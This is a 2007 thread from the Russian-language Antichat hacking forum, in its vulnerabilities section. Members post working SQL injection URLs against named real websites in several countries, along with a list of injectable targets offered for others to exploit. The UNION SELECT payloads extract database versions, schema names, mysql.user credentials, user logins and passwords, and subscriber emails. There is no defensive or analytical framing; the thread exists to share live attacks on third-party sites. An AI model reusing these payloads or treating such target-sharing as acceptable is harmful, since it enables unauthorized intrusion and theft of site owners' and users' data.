HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1651  
Старый 05.04.2007, 19:49
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

http://gostudy.com.ua

Код:
http://gostudy.com.ua/news.phtml?id=-40+union+select+1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/*
 

  #1652  
Старый 05.04.2007, 20:17
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.calit2.net/newsroom/article.php?id='%20union%20select%201,concat(user, char(58),password),3,4,5,6,7,8,9%20from%20mysql.us er/*
Цитата:
http://www.dailycal.org/printable.php?id=-15734%20UNION%20SELECT%200,1,2,3,4,AES_DECRYPT(AES _ENCRYPT(concat(user,char(58),password),0),0),6,7, 8,9,10,11,12,13,14,15,16%20from%20mysql.user/*
____

Последний раз редактировалось kamaz; 05.04.2007 в 20:21..
 

  #1653  
Старый 05.04.2007, 20:34
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,table_name+from+information_schema.tables+limit+46,1/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(109,97,105,110,95,117,115,101,114)+limit+0,1/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(id,char(58),user_login,char(58),user_pass,char(58),user_name,char(58),user_mail,char(58),user_url,char(58),user_icq,char(58),user_maillist,char(58),user_uroven)+from+svgroup_avenbibl.main_user+limit+0,1/*

Последний раз редактировалось Grey; 05.04.2007 в 20:39..
 

  #1654  
Старый 05.04.2007, 20:46
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

http://www.jemjabella.co.uk/postbyid.php?id='
http://www2.bham.ac.uk/core/core_picker/download.asp?documenttable='
http://www.thecomedystore.co.uk/page.php?id='
http://www.franinfo.co.uk/exhibitors.php?id='
http://www.franinfo.co.uk/exhi_detail.php?id='
http://www.jemjabella.co.uk/postbyid.php?id='
http://www.teltonika.lt/ru/pages/view/?id='
http://www.bendruomenes.lt/news.php?id='
http://www.biuropasaulis.lt/pk/produkcija/models.php?id='
http://www.bendruomenes.lt/news.php?id='
http://www.avilys.lt/index.php?id='
http://paulauskas.president.lt/one.phtml?id='
http://www.skautai.lt/users.php?id='
http://www.skautai.lt/index.php?id='
http://kaunas.lcn.lt/arkikatedra/index.php?id='
http://www.auksinisvarnas.lt/index.php?id='
http://www.eurodesk.lt/index.php?language='
http://www.esecurity.lt/article.php?id='
http://leidykla.ktu.lt/main.php?ID='

вот щас очень занят а хотел поковырять --давайте сами =)
 

  #1655  
Старый 05.04.2007, 21:21
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Вывод в title'е:

Код:
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+20,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_column,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=char(105,99,95,115,117,98,115,99,114,105,98,101,114,115)+limit+0,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13,14+from+ic_subscribers+limit+6,1/*
 

  #1656  
Старый 05.04.2007, 21:24
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

2genom--
Щас ковырнем малость
Цитата:
http://www.thecomedystore.co.uk/page.php?id=-2%20union%20select%201,concat(name,char(58),email) %20from%20orders/*
Цитата:
http://www.bendruomenes.lt/news.php?id=1%20union%20select%201,concat(username ,char(58),password),2,4,5,6,7,8,9,0%20from%20users/*
 

  #1657  
Старый 05.04.2007, 21:26
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),concat(user(),0x3a,database()),5,6/*&status=1
 

  #1658  
Старый 05.04.2007, 21:32
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

http://www.karavan-megastore.com.ua

Версия MySql:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,VERSION(),null,null
Логин текущего пользователя базы данных:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,USER(),null,null
Имя используемой базы данных:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,DATABASE(),null,null
Вот так всё простинька))

Последний раз редактировалось _GaLs_; 05.04.2007 в 21:35..
 

  #1659  
Старый 05.04.2007, 21:32
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.payolibre.com/noticias/noticias2.php?id=-413+union+select+1,2,3,4,user(),6/*
Код:
http://www.jerashfestival.com.jo/inner.php?id=-9+union+select+version()/*
Код:
http://www.iblaw.com.jo/practice.php?id=-8+union+select+1,database(),3,4/*
 

  #1660  
Старый 05.04.2007, 21:45
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

Код:
http://www.uris.com.ua/index.php?page=8&id=-8+union+select+1,2,concat(database(),0x3a,version()),4,5,6/*
вывод в title:
Код:
http://www.designplace.org/tutorials.php?page=1&c_id=-27+union+select+version(),2,3/*
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ